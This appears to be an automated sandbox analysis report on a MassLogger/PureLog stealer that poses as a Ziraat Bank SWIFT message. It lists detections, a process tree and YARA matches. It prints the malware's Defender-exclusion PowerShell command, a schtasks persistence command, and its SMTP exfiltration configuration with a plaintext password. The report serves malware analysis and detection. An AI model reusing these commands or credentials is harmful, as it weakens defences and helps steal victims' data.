Edit tour

Windows Analysis Report
Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe

Overview

General Information

Sample name:	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe
Analysis ID:	1562164
MD5:	91809ff066db31ab6e244e123d3dc970
SHA1:	5fd9295c5d2445b0706c85cfb720c992f3db0076
SHA256:	9a1973e5fed817352699227ba40f3d5149221221882377c9a127bbf011f7f1cd
Tags:	exeuser-lowmal3
Infos:

Detection

MassLogger RAT, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Yara detected AntiVM3

Yara detected MassLogger RAT

Yara detected PureLog Stealer

Yara detected Telegram RAT

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains very large strings

.NET source code references suspicious native API functions

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Binary is likely a compiled AutoIt script file

Contains functionality to capture screen (.Net source)

Contains functionality to log keystrokes (.Net Source)

Drops VBS files to the startup folder

Drops large PE files

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: WScript or CScript Dropper

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evaded block containing many API calls

Found evasive API chain (may stop execution after checking a module file name)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Powershell Defender Exclusion

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe (PID: 7616 cmdline: "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe" MD5: 91809FF066DB31AB6E244E123D3DC970)

directiveness.exe (PID: 7712 cmdline: "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe" MD5: 91809FF066DB31AB6E244E123D3DC970)

RegSvcs.exe (PID: 7752 cmdline: "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

Trading_AIBot.exe (PID: 7796 cmdline: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" MD5: E91A1DB64F5262A633465A0AAFF7A0B0)

powershell.exe (PID: 7896 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 8100 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 7928 cmdline: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 03:50 /du 23:59 /sc daily /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

apihost.exe (PID: 7760 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" MD5: BFC26CE0E7B874E618CC8D0CF3657608)

server01.exe (PID: 7812 cmdline: "C:\Users\user\AppData\Local\Temp\server01.exe" MD5: 0CDBE0CD3CB5C2F0B2CB17E4417D43F5)

wscript.exe (PID: 7248 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\directiveness.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

directiveness.exe (PID: 3820 cmdline: "C:\Users\user\AppData\Local\cyclop\directiveness.exe" MD5: 91809FF066DB31AB6E244E123D3DC970)

RegSvcs.exe (PID: 2656 cmdline: "C:\Users\user\AppData\Local\cyclop\directiveness.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cleanup

Malware Configuration

Threatname: MassLogger

{"EXfil Mode": "SMTP", "From": "info2@j-fores.com", "Password": "london@1759", "Server": "s82.gocheapweb.com", "To": "info@j-fores.com", "Port": 587}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\server01.exe	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
C:\Users\user\AppData\Local\Temp\server01.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\server01.exe	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
C:\Users\user\AppData\Local\Temp\server01.exe	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x10191:$a1: get_encryptedPassword 0x104cd:$a2: get_encryptedUsername 0xff1e:$a3: get_timePasswordChanged 0x1003f:$a4: get_passwordField 0x101a7:$a5: set_encryptedPassword 0x11b77:$a7: get_logins 0x11828:$a8: GetOutlookPasswords 0x11606:$a9: StartKeylogger 0x11ac7:$a10: KeyLoggerEventArgs 0x11663:$a11: KeyLoggerEventArgsEventHandler
C:\Users\user\AppData\Local\Temp\server01.exe	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.1367554523.0000000002D40000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000003.00000002.1367391345.0000000002CB0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000003.00000002.1359842969.0000000000400000.00000040.80000000.00040000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 F8 88 44 24 2B 88 44 24 2F B0 3D 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000003.00000002.1368343181.0000000003F1D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000003.00000002.1368343181.0000000003F1D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.1368343181.0000000003F1D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000003.00000002.1368343181.0000000003F1D000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x28751:$a1: get_encryptedPassword 0x40781:$a1: get_encryptedPassword 0x587a1:$a1: get_encryptedPassword 0x28a8d:$a2: get_encryptedUsername 0x40abd:$a2: get_encryptedUsername 0x58add:$a2: get_encryptedUsername 0x284de:$a3: get_timePasswordChanged 0x4050e:$a3: get_timePasswordChanged 0x5852e:$a3: get_timePasswordChanged 0x285ff:$a4: get_passwordField 0x4062f:$a4: get_passwordField 0x5864f:$a4: get_passwordField 0x28767:$a5: set_encryptedPassword 0x40797:$a5: set_encryptedPassword 0x587b7:$a5: set_encryptedPassword 0x2a137:$a7: get_logins 0x42167:$a7: get_logins 0x5a187:$a7: get_logins 0x29de8:$a8: GetOutlookPasswords 0x41e18:$a8: GetOutlookPasswords 0x59e38:$a8: GetOutlookPasswords
00000005.00000000.1358693008.0000000000872000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000005.00000000.1358693008.0000000000872000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000000.1358693008.0000000000872000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000C.00000002.1486418778.0000000004060000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 F8 88 44 24 2B 88 44 24 2F B0 3D 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
00000005.00000000.1358693008.0000000000872000.00000002.00000001.01000000.0000000A.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xff91:$a1: get_encryptedPassword 0x102cd:$a2: get_encryptedUsername 0xfd1e:$a3: get_timePasswordChanged 0xfe3f:$a4: get_passwordField 0xffa7:$a5: set_encryptedPassword 0x11977:$a7: get_logins 0x11628:$a8: GetOutlookPasswords 0x11406:$a9: StartKeylogger 0x118c7:$a10: KeyLoggerEventArgs 0x11463:$a11: KeyLoggerEventArgsEventHandler
00000003.00000002.1368343181.0000000003EA5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000002.00000002.1355540566.00000000039B0000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 F8 88 44 24 2B 88 44 24 2F B0 3D 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
00000003.00000002.1365681539.00000000029D1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000005.00000002.2592996086.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 7752	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 7752	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 7752	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegSvcs.exe PID: 7752	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 7752	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c35:$a1: get_encryptedPassword 0x2f62:$a2: get_encryptedUsername 0x29d6:$a3: get_timePasswordChanged 0x2af7:$a4: get_passwordField 0x2c4b:$a5: set_encryptedPassword 0x45bd:$a7: get_logins 0x426e:$a8: GetOutlookPasswords 0x404c:$a9: StartKeylogger 0x450d:$a10: KeyLoggerEventArgs 0x40a9:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: server01.exe PID: 7812	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: server01.exe PID: 7812	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: server01.exe PID: 7812	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: server01.exe PID: 7812	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2af6:$a1: get_encryptedPassword 0x2e23:$a2: get_encryptedUsername 0x2897:$a3: get_timePasswordChanged 0x29b8:$a4: get_passwordField 0x2b0c:$a5: set_encryptedPassword 0x447e:$a7: get_logins 0x412f:$a8: GetOutlookPasswords 0x3f0d:$a9: StartKeylogger 0x43ce:$a10: KeyLoggerEventArgs 0x3f6a:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: RegSvcs.exe PID: 2656	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 21 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.RegSvcs.exe.2a11f56.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.RegSvcs.exe.2a11f56.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.RegSvcs.exe.3f355c0.14.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
3.2.RegSvcs.exe.3f355c0.14.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.RegSvcs.exe.3f355c0.14.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.directiveness.exe.39b0000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 F8 88 44 24 2B 88 44 24 2F B0 3D 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
3.2.RegSvcs.exe.3f355c0.14.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xe391:$a1: get_encryptedPassword 0xe6cd:$a2: get_encryptedUsername 0xe11e:$a3: get_timePasswordChanged 0xe23f:$a4: get_passwordField 0xe3a7:$a5: set_encryptedPassword 0xfd77:$a7: get_logins 0xfa28:$a8: GetOutlookPasswords 0xf806:$a9: StartKeylogger 0xfcc7:$a10: KeyLoggerEventArgs 0xf863:$a11: KeyLoggerEventArgsEventHandler
3.2.RegSvcs.exe.3f355c0.14.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x135a9:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x12aa7:$a3: \Google\Chrome\User Data\Default\Login Data 0x12db5:$a4: \Orbitum\User Data\Default\Login Data 0x13bad:$a5: \Kometa\User Data\Default\Login Data
3.2.RegSvcs.exe.2cb0ee8.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.0.server01.exe.870000.0.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
5.0.server01.exe.870000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.0.server01.exe.870000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.0.server01.exe.870000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x10191:$a1: get_encryptedPassword 0x104cd:$a2: get_encryptedUsername 0xff1e:$a3: get_timePasswordChanged 0x1003f:$a4: get_passwordField 0x101a7:$a5: set_encryptedPassword 0x11b77:$a7: get_logins 0x11828:$a8: GetOutlookPasswords 0x11606:$a9: StartKeylogger 0x11ac7:$a10: KeyLoggerEventArgs 0x11663:$a11: KeyLoggerEventArgsEventHandler
5.0.server01.exe.870000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x153a9:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x148a7:$a3: \Google\Chrome\User Data\Default\Login Data 0x14bb5:$a4: \Orbitum\User Data\Default\Login Data 0x159ad:$a5: \Kometa\User Data\Default\Login Data
3.2.RegSvcs.exe.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 F8 88 44 24 2B 88 44 24 2F B0 3D 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
3.2.RegSvcs.exe.3f4d5f0.12.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
3.2.RegSvcs.exe.3f4d5f0.12.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.RegSvcs.exe.3f4d5f0.12.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.RegSvcs.exe.3f4d5f0.12.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x10191:$a1: get_encryptedPassword 0x281b1:$a1: get_encryptedPassword 0x104cd:$a2: get_encryptedUsername 0x284ed:$a2: get_encryptedUsername 0xff1e:$a3: get_timePasswordChanged 0x27f3e:$a3: get_timePasswordChanged 0x1003f:$a4: get_passwordField 0x2805f:$a4: get_passwordField 0x101a7:$a5: set_encryptedPassword 0x281c7:$a5: set_encryptedPassword 0x11b77:$a7: get_logins 0x29b97:$a7: get_logins 0x11828:$a8: GetOutlookPasswords 0x29848:$a8: GetOutlookPasswords 0x11606:$a9: StartKeylogger 0x29626:$a9: StartKeylogger 0x11ac7:$a10: KeyLoggerEventArgs 0x29ae7:$a10: KeyLoggerEventArgs 0x11663:$a11: KeyLoggerEventArgsEventHandler 0x29683:$a11: KeyLoggerEventArgsEventHandler
3.2.RegSvcs.exe.3f4d5f0.12.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x153a9:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x2d3c9:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x148a7:$a3: \Google\Chrome\User Data\Default\Login Data 0x2c8c7:$a3: \Google\Chrome\User Data\Default\Login Data 0x14bb5:$a4: \Orbitum\User Data\Default\Login Data 0x2cbd5:$a4: \Orbitum\User Data\Default\Login Data 0x159ad:$a5: \Kometa\User Data\Default\Login Data 0x2d9cd:$a5: \Kometa\User Data\Default\Login Data
3.2.RegSvcs.exe.2cb0ee8.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.RegSvcs.exe.2a12e3e.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.RegSvcs.exe.3ee0190.13.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.RegSvcs.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 F8 88 44 24 2B 88 44 24 2F B0 3D 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
3.2.RegSvcs.exe.3f355c0.14.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
3.2.RegSvcs.exe.3f355c0.14.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.RegSvcs.exe.3f355c0.14.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.RegSvcs.exe.3f355c0.14.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x10191:$a1: get_encryptedPassword 0x281c1:$a1: get_encryptedPassword 0x401e1:$a1: get_encryptedPassword 0x104cd:$a2: get_encryptedUsername 0x284fd:$a2: get_encryptedUsername 0x4051d:$a2: get_encryptedUsername 0xff1e:$a3: get_timePasswordChanged 0x27f4e:$a3: get_timePasswordChanged 0x3ff6e:$a3: get_timePasswordChanged 0x1003f:$a4: get_passwordField 0x2806f:$a4: get_passwordField 0x4008f:$a4: get_passwordField 0x101a7:$a5: set_encryptedPassword 0x281d7:$a5: set_encryptedPassword 0x401f7:$a5: set_encryptedPassword 0x11b77:$a7: get_logins 0x29ba7:$a7: get_logins 0x41bc7:$a7: get_logins 0x11828:$a8: GetOutlookPasswords 0x29858:$a8: GetOutlookPasswords 0x41878:$a8: GetOutlookPasswords
3.2.RegSvcs.exe.3f355c0.14.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x153a9:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x2d3d9:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x453f9:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x148a7:$a3: \Google\Chrome\User Data\Default\Login Data 0x2c8d7:$a3: \Google\Chrome\User Data\Default\Login Data 0x448f7:$a3: \Google\Chrome\User Data\Default\Login Data 0x14bb5:$a4: \Orbitum\User Data\Default\Login Data 0x2cbe5:$a4: \Orbitum\User Data\Default\Login Data 0x44c05:$a4: \Orbitum\User Data\Default\Login Data 0x159ad:$a5: \Kometa\User Data\Default\Login Data 0x2d9dd:$a5: \Kometa\User Data\Default\Login Data 0x459fd:$a5: \Kometa\User Data\Default\Login Data
3.2.RegSvcs.exe.3ea6458.9.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.RegSvcs.exe.3ea5570.11.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.RegSvcs.exe.2a12e3e.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.RegSvcs.exe.2d40000.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.RegSvcs.exe.2cb0000.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.RegSvcs.exe.2cb0000.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.RegSvcs.exe.3ea6458.9.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
12.2.directiveness.exe.4060000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 F8 88 44 24 2B 88 44 24 2F B0 3D 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
3.2.RegSvcs.exe.3f65610.10.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
3.2.RegSvcs.exe.3f65610.10.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.RegSvcs.exe.3f65610.10.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
